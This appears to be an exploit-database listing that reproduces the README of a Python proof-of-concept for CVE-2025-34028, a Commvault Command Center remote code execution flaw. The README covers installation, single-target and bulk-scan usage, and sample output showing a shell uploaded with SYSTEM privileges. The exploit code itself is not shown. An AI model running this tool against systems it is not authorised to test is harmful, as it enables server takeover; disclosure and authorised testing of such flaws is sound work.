CVE-2025-34028 PoC — Commvault Command Center Innovation Release <= 11.38.25 Unathenticated Install Package Path Traversal

Source

Associated Vulnerability

Description

Proof-of-Concept (PoC) for CVE-2025-34028, a Remote Code Execution vulnerability in Commvault Command Center. This Python script scans single or multiple targets, executes commands, and reports vulnerable hosts.

Readme

# CVE-2025-34028 - Commvault Command Center Remote Code Execution
![Python](https://img.shields.io/badge/python-3.6+-blue.svg) ![License](https://img.shields.io/badge/license-MIT-green.svg) ![Vulnerability](https://img.shields.io/badge/critical-RCE-red.svg)

A Python exploit for CVE-2025-34028, a remote code execution vulnerability in Commvault Command Center. This tool allows testing single targets or scanning multiple hosts in bulk.

## Features
- Single target or bulk scanning capability
- Automatic Commvault instance verification
- Detailed output with system user information
- Random path generation for each execution
- Clean summary table of vulnerable hosts
- Comprehensive error handling

## Installation
```bash
git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt
```

## Requirements
- Python 3.6+
- Required packages:
  - requests
  - tabulate

Install requirements with:
```bash
pip install requests tabulate
```

## Usage
```text
usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)

CVE-2025-34028 Commvault RCE Exploit

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Single target URL (e.g., https://192.168.1.100:8000)
  -f TARGETS_FILE, --file TARGETS_FILE
                        File containing multiple targets, one per line
```

## Examples
Test a single target:
```bash
python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000
```

Scan multiple targets from a file:
```bash
python CVE-2025-34028-Commvault.py -f targets.txt
```

## Target File Format
The targets file should contain one target per line in the format:
```text
https://host:port
http://ip
```

Example targets.txt:
```text
https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443
```

## Output
The script provides:
- Real-time progress with status for each target
- Detailed output for vulnerable hosts
- Summary table of all tested hosts
- Clear identification of successful exploitations

Sample output:
```text
CVE-2025-34028 Commvault RCE PoC

[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM

[+] Results Summary
+---------+------------------------------+---------------------+------------------+
| Index   | URL                          | Status              | System User      |
+---------+------------------------------+---------------------+------------------+
| 1       | https://cvtest.example.com:8000 | RCE Successful      | NT AUTHORITY\SYSTEM |
+---------+------------------------------+---------------------+------------------+
```

## Disclaimer
This tool is for educational and authorized testing purposes only. The author is not responsible for any misuse or damage caused by this program.

## License
MIT License - See LICENSE file for details

File Snapshot

 [4.0K]  /data/pocs/fa926f8f254c5cc45125e3273c38e8b21fa0b756
├── [5.8K]  CVE-2025-34028-Commvault.py
├── [1.0K]  LICENSE
├── [2.9K]  README.md
└── [  49]  requirements.txt

0 directories, 4 files

Remarks